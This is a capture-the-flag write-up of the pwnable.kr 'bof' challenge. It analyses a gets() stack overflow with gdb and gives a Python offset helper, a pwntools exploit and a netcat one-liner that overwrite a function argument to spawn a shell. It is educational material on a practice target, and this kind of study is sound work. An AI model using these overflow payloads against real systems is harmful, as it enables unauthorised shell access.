[Problem]


[Solution]

Mitigation analysis

  • 32-bit binary
  • Stack canary present
  • NX present
  • PIE present


Source code analysis - bof.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}

int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}
  • main calls func with the argument 0xdeadbeef
  • gets reads input into overflowme with no length limit
    • overflowme is a 32-byte stack buffer
  • If key equals 0xcafebabe, system("/bin/sh") runs and a shell is obtained


Running the binary


gdb analysis - main

pwndbg> disass main
Dump of assembler code for function main:
   0x0000068a <+0>:	push   ebp
   0x0000068b <+1>:	mov    ebp,esp
   0x0000068d <+3>:	and    esp,0xfffffff0
   0x00000690 <+6>:	sub    esp,0x10
   0x00000693 <+9>:	mov    DWORD PTR [esp],0xdeadbeef
   0x0000069a <+16>:	call   0x62c <func>
   0x0000069f <+21>:	mov    eax,0x0
   0x000006a4 <+26>:	leave  
   0x000006a5 <+27>:	ret    
End of assembler dump.
  • main writes 0xdeadbeef to [esp], which was 0xffffd1b0 at the call; after call pushes the return address and func pushes ebp, that same slot is [ebp+0x8] inside func
  • This dump was taken before the binary was loaded, so the PIE addresses are unrelocated (main at 0x68a); the func dump below shows the runtime base 0x56555000


gdb analysis - func

pwndbg> disass func
Dump of assembler code for function func:
   0x5655562c <+0>:	push   ebp
   0x5655562d <+1>:	mov    ebp,esp
   0x5655562f <+3>:	sub    esp,0x48
   0x56555632 <+6>:	mov    eax,gs:0x14
   0x56555638 <+12>:	mov    DWORD PTR [ebp-0xc],eax
   0x5655563b <+15>:	xor    eax,eax
   0x5655563d <+17>:	mov    DWORD PTR [esp],0x5655578c
   0x56555644 <+24>:	call   0xf7e35c40 <__GI__IO_puts>
   0x56555649 <+29>:	lea    eax,[ebp-0x2c]
   0x5655564c <+32>:	mov    DWORD PTR [esp],eax
   0x5655564f <+35>:	call   0xf7e35120 <_IO_gets>
=> 0x56555654 <+40>:	cmp    DWORD PTR [ebp+0x8],0xcafebabe
   0x5655565b <+47>:	jne    0x5655566b <func+63>
   0x5655565d <+49>:	mov    DWORD PTR [esp],0x5655579b
   0x56555664 <+56>:	call   0xf7e09780 <__libc_system>
   0x56555669 <+61>:	jmp    0x56555677 <func+75>
   0x5655566b <+63>:	mov    DWORD PTR [esp],0x565557a3
   0x56555672 <+70>:	call   0xf7e35c40 <__GI__IO_puts>
   0x56555677 <+75>:	mov    eax,DWORD PTR [ebp-0xc]
   0x5655567a <+78>:	xor    eax,DWORD PTR gs:0x14
   0x56555681 <+85>:	je     0x56555688 <func+92>
   0x56555683 <+87>:	call   0xf7edc530 <__stack_chk_fail>
   0x56555688 <+92>:	leave  
   0x56555689 <+93>:	ret    
End of assembler dump.

  • A long run of 'a' characters was entered as the input for overflowme
  • The input is written to 0xffffd17c, the address of overflowme (ebp-0x2c) that func placed in [esp] as the argument to gets
  • 0xdeadbeef can be seen at ebp+0x8, i.e. 0xffffd1b0; 0xffffd1b0 - 0xffffd17c = 0x34 = 52 bytes, so the key argument starts 52 bytes after the first byte of overflowme
  • That value is compared with 0xcafebabe; if equal, system("/bin/sh") runs, otherwise "Nah.." is printed and the function returns
  • The canary at ebp-0xc sits between overflowme and the argument, so the overflow clobbers it as well, but __stack_chk_fail is only reached from the epilogue (func+75 onwards), after system() at func+56 has already returned; the shell is spawned first, and "stack smashing detected" only fires once that shell exits


Solving the problem

💡  Use the stack overflow to overwrite the 0xdeadbeef argument with 0xcafebabe: [dummy(52)] + [0xcafebabe]
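The offset arithmetic behind [dummy(52)] + [0xcafebabe], as an added example that is not part of the original post. The frame offsets are the ones read off the func disassembly above, the two absolute addresses are the ones observed in gdb, and the helper names (offset_from_buffer, build_payload, clobbered_slots) are hypothetical. It builds the same payload with struct.pack instead of pwntools so it runs offline, and it also works out which frame slots a gets() write of a given length reaches, counting the terminating NUL that gets appends.

```python
import struct

# Frame layout of func(), read off the disassembly on this page.
# Offsets are relative to ebp inside func; every slot is 4 bytes on this 32-bit binary.
OVERFLOWME = -0x2c   # lea eax,[ebp-0x2c]               -> char overflowme[32]
CANARY     = -0x0c   # mov DWORD PTR [ebp-0xc],eax      -> stack canary copied from gs:0x14
SAVED_EBP  =  0x00   # written by "push ebp" in the prologue
RET_ADDR   =  0x04   # pushed by "call func" in main
KEY        =  0x08   # cmp DWORD PTR [ebp+0x8],0xcafebabe -> the int key argument

FRAME = {
    "overflowme": OVERFLOWME,
    "canary": CANARY,
    "saved_ebp": SAVED_EBP,
    "return_address": RET_ADDR,
    "key": KEY,
}

# Absolute addresses observed in gdb on this page (same process, same frame).
OBSERVED_OVERFLOWME = 0xffffd17c   # value passed in [esp] to gets
OBSERVED_KEY = 0xffffd1b0          # where main stored 0xdeadbeef


def offset_from_buffer(slot):
    """Bytes from the first byte of overflowme to the start of the given frame slot."""
    return FRAME[slot] - OVERFLOWME


def build_payload(key=0xcafebabe, filler=b"a"):
    """Padding up to the key slot, then the new key as a little-endian dword."""
    return filler * offset_from_buffer("key") + struct.pack("<I", key)


def clobbered_slots(payload_len):
    """Frame slots (beyond the buffer itself) that a gets() write of payload_len bytes
    overlaps.  gets strips the newline and stores a NUL after the data, so the write
    is one byte longer than the payload."""
    write_len = payload_len + 1
    return [
        name for name, off in FRAME.items()
        if name != "overflowme" and write_len > off - OVERFLOWME
    ]


if __name__ == "__main__":
    # Cross-check the disassembly offsets against the addresses seen at runtime.
    assert OBSERVED_KEY - OBSERVED_OVERFLOWME == offset_from_buffer("key")
    payload = build_payload()
    print("padding to key:", offset_from_buffer("key"))        # 52
    print("payload:", payload.hex())
    print("slots hit by a %d-byte line:" % len(payload), clobbered_slots(len(payload)))
```

clobbered_slots(56) includes the canary: the payload does smash it, but func only compares it against gs:0x14 in the epilogue, after system() has returned, which is why the canary does not stop this exploit. Note also that a bare 52-byte line with nothing appended would still zero the low byte of key through the terminating NUL, so the padding must be exactly 52 bytes followed by the full dword.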

 

Exploit - Pwntools

from pwn import *

p = remote("pwnable.kr", 9000)

# 52 bytes of filler span from overflowme (ebp-0x2c) up to the key argument (ebp+0x8);
# the next 4 bytes replace key with 0xcafebabe in little-endian order.
# Use bytes, not str, so this works under Python 3.
payload = b"a" * 52 + p32(0xcafebabe)

p.sendline(payload)
p.interactive()

💡 Equivalent without pwntools (Python 2 print syntax; cat keeps stdin open so the spawned shell stays usable): (python -c 'print "a"*52+"\xbe\xba\xfe\xca"';cat) | nc pwnable.kr 9000


flag

🍒 daddy, I just pwned a buFFer :)

 
